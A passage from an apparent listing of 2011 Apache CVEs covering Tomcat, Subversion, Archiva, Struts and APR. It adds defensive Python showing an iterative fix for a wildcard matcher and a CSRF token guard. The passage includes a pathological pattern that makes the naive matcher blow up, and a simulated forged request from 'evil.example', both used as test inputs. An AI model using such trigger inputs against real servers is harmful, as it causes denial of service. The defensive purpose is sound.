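    """Same language, no recursion: remember the most recent '*' and where in
    name it currently stops; on a mismatch, go back to that star and let it
    absorb one more character.  Work is bounded by len(pattern) * len(name)
    and the stack does not grow with the input at all."""
    p = n = 0
    star = -1      # index in pattern of the last '*' seen
    star_n = 0     # index in name where that '*' currently stops matching
    while n < len(name):
        if p < len(pattern) and pattern[p] == "*":
            star, star_n = p, n
            p += 1
        elif p < len(pattern) and (pattern[p] == "?" or pattern[p] == name[n]):
            p += 1
            n += 1
        elif star != -1:
            star_n += 1
            p, n = star + 1, star_n
        else:
            return False
    while p < len(pattern) and pattern[p] == "*":
        p += 1
    return p == len(pattern)


# Constructed cases with known answers, used to show both matchers agree.
CASES = [("*.jsp", "index.jsp", True), ("*?", "", False), ("*?", "a", True),
         ("a*b?c", "axxbyc", True), ("a*b?c", "abc", False),
         ("*?*?*?", "ab", False), ("*?*?*?", "abc", True),
         ("**", "", True), ("?", "", False)]


def matchers_agree() -> bool:
    return all(fnmatch_recursive(p, s) == fnmatch_iterative(p, s) == want
               for p, s, want in CASES)


if __name__ == "__main__":
    print("agree on known cases:", matchers_agree())
    # A non-matching name forces the naive matcher to explore every split.
    for units in range(1, 5):
        pat = "*?" * units + "b"
        print(pat, "calls:", recursive_call_count(pat, "a" * 15))
    # The iterative matcher handles a pattern the naive one could not finish.
    print(fnmatch_iterative("*?" * 200 + "b", "a" * 2000))
```

Do not feed the long pattern from the last line to fnmatch_recursive: that is exactly the CPU and memory consumption the advisory describes, and it is why the fixed APR rewrote the matcher without recursion.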

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
netbsd netbsd 5.1
apache http_server *
debian debian_linux 6.0
debian debian_linux 7.0
google android *
apache portable_runtime *
suse linux_enterprise_server 10
debian debian_linux 5.0
freebsd freebsd *
oracle solaris 10
apple mac_os_x 10.6.0
openbsd openbsd 4.8
CVE-2011-0533 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta; and Archiva 1.3.0 through 1.3.3 and 1.0 through 1.22 allows remote attackers to inject arbitrary web script or HTML via a crafted parameter, related to the autoIncludeParameters setting for the extremecomponents table.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache continuum 1.2.3.1
apache archiva 1.1.4
apache continuum 1.2
apache archiva 1.2
apache continuum 1.2.3
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2.2
apache continuum 1.3.6
apache archiva 1.3.1
apache continuum 1.1
apache archiva 1.1
apache archiva 1.2.1
apache continuum 1.4.0
apache archiva 1.1.2
apache continuum 1.2.2
apache archiva 1.0
apache archiva 1.3.3
apache archiva 1.0.2
apache archiva 1.3.2
CVE-2011-0534 MEDIUM

Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.18
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.6
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 6.0.3
apache tomcat 7.0.0
apache tomcat 6.0.14
apache tomcat 6.0.17
CVE-2011-0715 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 0.28.2
apache subversion 0.7
apache subversion 0.8
apache subversion 0.28.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 0.28.1
apache subversion 0.33.0
apache subversion 1.5.6
apache subversion 0.25.0
apache subversion 0.14.5
apache subversion 1.1.2
apache subversion 0.16
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 0.35.0
apache subversion 1.0.8
apache subversion 1.6.12
apache subversion 0.17.0
apache subversion 1.6.13
apache subversion 0.32.1
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 0.18.0
apache subversion 1.5.8
apache subversion 1.2.3
apache subversion 0.13.1
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 0.22.0
apache subversion 1.6.0
apache subversion 0.23.0
apache subversion m3
apache subversion 1.5.2
apache subversion 0.12.0
apache subversion 0.14.0
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 0.14.3
apache subversion 0.27.0
apache subversion 1.4.6
apache subversion 0.14.4
apache subversion 0.10.0
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.6.10
apache subversion 0.35.1
apache subversion 0.24.1
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 0.31.0
apache subversion 0.30.0
apache subversion 0.36.0
apache subversion 1.4.0
apache subversion 0.10.2
apache subversion 0.22.1
apache subversion 0.9
apache subversion 1.3.2
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion m1
apache subversion 1.0.6
apache subversion 0.29.0
apache subversion 1.6.11
apache subversion 0.14.2
apache subversion 0.24.2
apache subversion 0.34.0
apache subversion 0.21.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 0.15
apache subversion 1.3.1
apache subversion 0.26.0
apache subversion 0.33.1
apache subversion *
apache subversion 0.10.1
apache subversion 0.13.2
apache subversion 0.13.0
apache subversion 1.1.4
apache subversion 0.17.1
apache subversion 0.19.1
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.14
apache subversion 0.20.0
apache subversion 0.20.1
apache subversion 0.24.0
apache subversion 1.5.7
apache subversion 0.37.0
apache subversion 0.11.1
apache subversion m2
apache subversion 0.22.2
apache subversion 0.18.1
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.5.4
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 0.19.0
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 0.16.1
apache subversion 0.14.1
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion m4/m5
apache subversion 0.6
apache subversion 1.4.1
CVE-2011-1026 MEDIUM

Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
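
This entry, CVE-2010-2234 (CouchDB) and CVE-2010-3449 (Redback) describe the same weakness: an administrator's browser attaches the session cookie to any request, including one a hostile page submits, so the cookie alone cannot prove the administrator intended the action. The Python below is an added illustration, not Archiva, Redback or CouchDB code: a per-session synchronizer token checked with a constant-time compare, plus an Origin/Referer check, applied to every state-changing method. Session identifiers, origins and form fields are constructed for the example.

```python
import hmac
import secrets


class CsrfGuard:
    """Per-session synchronizer token plus an Origin/Referer check for every
    state-changing request.  Safe methods pass through untouched."""

    SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

    def __init__(self, site_origin: str):
        self.site_origin = site_origin.rstrip("/")
        self.tokens = {}             # session id -> token (in-memory stand-in for the session store)

    def issue_token(self, session_id: str) -> str:
        """Called when rendering a form; the value goes into a hidden field."""
        token = secrets.token_urlsafe(32)
        self.tokens[session_id] = token
        return token

    def _origin_ok(self, headers: dict) -> bool:
        origin = headers.get("Origin") or headers.get("Referer") or ""
        return origin == self.site_origin or origin.startswith(self.site_origin + "/")

    def allow(self, method: str, session_id: str, headers: dict, form: dict) -> bool:
        if method.upper() in self.SAFE_METHODS:
            return True
        if not self._origin_ok(headers):
            return False             # cross-site page (or a client that hides both headers)
        expected = self.tokens.get(session_id)
        supplied = form.get("_csrf", "")
        if not expected:
            return False             # no token was ever issued to this session
        # Encode to bytes: compare_digest on str rejects non-ASCII input with TypeError.
        return hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8"))


if __name__ == "__main__":
    guard = CsrfGuard("https://archiva.example")
    token = guard.issue_token("admin-session")
    # Attacker-controlled page auto-submits a form; the browser adds the cookie,
    # but neither the token nor a same-site Origin is there.
    print("forged:", guard.allow("POST", "admin-session",
                                 {"Origin": "https://evil.example"},
                                 {"username": "mallory", "role": "admin"}))
    print("legit :", guard.allow("POST", "admin-session",
                                 {"Origin": "https://archiva.example"},
                                 {"username": "alice", "_csrf": token}))
```

The token check is the part that closes the hole; the Origin check is defence in depth against a token that leaked through a template or log.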

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache archiva 1.1.4
apache archiva 1.2
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2-m1
apache archiva 1.2.2
apache archiva 1.3.1
apache archiva 1.1
apache archiva 1.2.1
apache archiva 1.1.2
apache archiva 1.3.4
apache archiva 1.0
apache archiva 1.3.3
apache archiva 1.0.2
apache archiva 1.3.2
CVE-2011-1077 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache archiva 1.1.4
apache archiva 1.2
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2-m1
apache archiva 1.2.2
apache archiva 1.3.1
apache archiva 1.1
apache archiva 1.2.1
apache archiva 1.1.2
apache archiva 1.3.4
apache archiva 1.0
apache archiva 1.3.3
apache archiva 1.0.2
apache archiva 1.3.2
CVE-2011-1088 MEDIUM

Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.1
apache tomcat 7.0.6
apache tomcat 7.0.5
apache tomcat 7.0.3
apache tomcat 7.0.0
apache tomcat 7.0.8
CVE-2011-1183 MEDIUM

Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.11
CVE-2011-1184 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-1419 MEDIUM

Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.5
apache tomcat 7.0.3
apache tomcat 7.0.0
apache tomcat 7.0.8
CVE-2011-1475 MEDIUM

The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.11
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-1498 MEDIUM

Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache httpclient 4.1
apache httpclient 4.0
apache httpclient 4.0.1
CVE-2011-1582 MEDIUM

Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.12
apache tomcat 7.0.13
CVE-2011-1752 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 14
debian debian_linux 5.0
apple mac_os_x *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
apache subversion *
fedoraproject fedora 15
canonical ubuntu_linux 11.04
CVE-2011-1772 LOW

Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.0.7
apache struts 2.1.5
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
opensymphony xwork *
apache struts 2.0.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.0.5
opensymphony webwork *
apache struts 2.1.6
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.0.12
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.0.0
CVE-2011-1783 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
fedoraproject fedora 14
debian debian_linux 5.0
apple mac_os_x *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
apache subversion *
fedoraproject fedora 15
canonical ubuntu_linux 11.04
CVE-2011-1921 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache subversion 1.5.5
apache subversion 1.5.7
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.5.2
apache subversion 1.6.11
apache subversion 1.5.0
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.5.4
apache subversion 1.5.6
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
CVE-2011-1928 MEDIUM

The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache apr-util 1.4.4
apache http_server 2.2.18
apache apr-util 1.4.3
CVE-2011-2087 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.0.7
apache struts 2.1.5
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.0.5
apache struts 2.1.6
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.0.12
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.0.0
CVE-2011-2088 MEDIUM

XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
opensymphony xwork -
opensymphony webwork -
apache struts 2.2.1
opensymphony xwork 2.2.1
CVE-2011-2204 LOW

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-2329 MEDIUM

The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache rampart/c 1.3.0
CVE-2011-2481 MEDIUM

Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.14
apache tomcat 7.0.1
apache tomcat 7.0.13
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 7.0.11
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-2487 MEDIUM

The implementations of PKCS#1 v1.5 key transport mechanism for XMLEncryption in JBossWS and Apache WSS4J before 1.6.5 is susceptible to a Bleichenbacher attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-327,

Products Affected

Vendor Product Version
redhat jboss_enterprise_web_platform 5.0.0
redhat jboss_portal 4.0.0
redhat jboss_web_services -
redhat jboss_enterprise_application_platform_text-only_advisories -
redhat jboss_enterprise_soa_platform 4.3.0
apache cxf *
redhat jboss_enterprise_soa_platform 4.2.0
redhat jboss_middleware_text-only_advisories -
redhat jboss_enterprise_application_platform 5.0.0
apache wss4j *
redhat jboss_business_rules_management_system 5.3
CVE-2011-2516 MEDIUM

Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.6.0
shibboleth shibboleth-sp 2.3
shibboleth shibboleth-sp 2.4.1
shibboleth shibboleth-sp 1.3.2
shibboleth shibboleth-sp 2.1
shibboleth shibboleth-sp 2.2.1
shibboleth shibboleth-sp 2.4
shibboleth shibboleth-sp *
shibboleth shibboleth-sp 1.3f
shibboleth shibboleth-sp 1.3.3
shibboleth shibboleth-sp 1.3.1
shibboleth shibboleth-sp 1.3.4
shibboleth shibboleth-sp 1.3.5
shibboleth shibboleth-sp 2.0
shibboleth shibboleth-sp 2.3.1
shibboleth shibboleth-sp 2.2
CVE-2011-2526 MEDIUM

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-2712 LOW

Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket 1.4.10
apache wicket 1.4.2
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 1.4.12
apache wicket 1.4.0
apache wicket 1.4.8
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.17
apache wicket 1.4.4
apache wicket 1.4.13
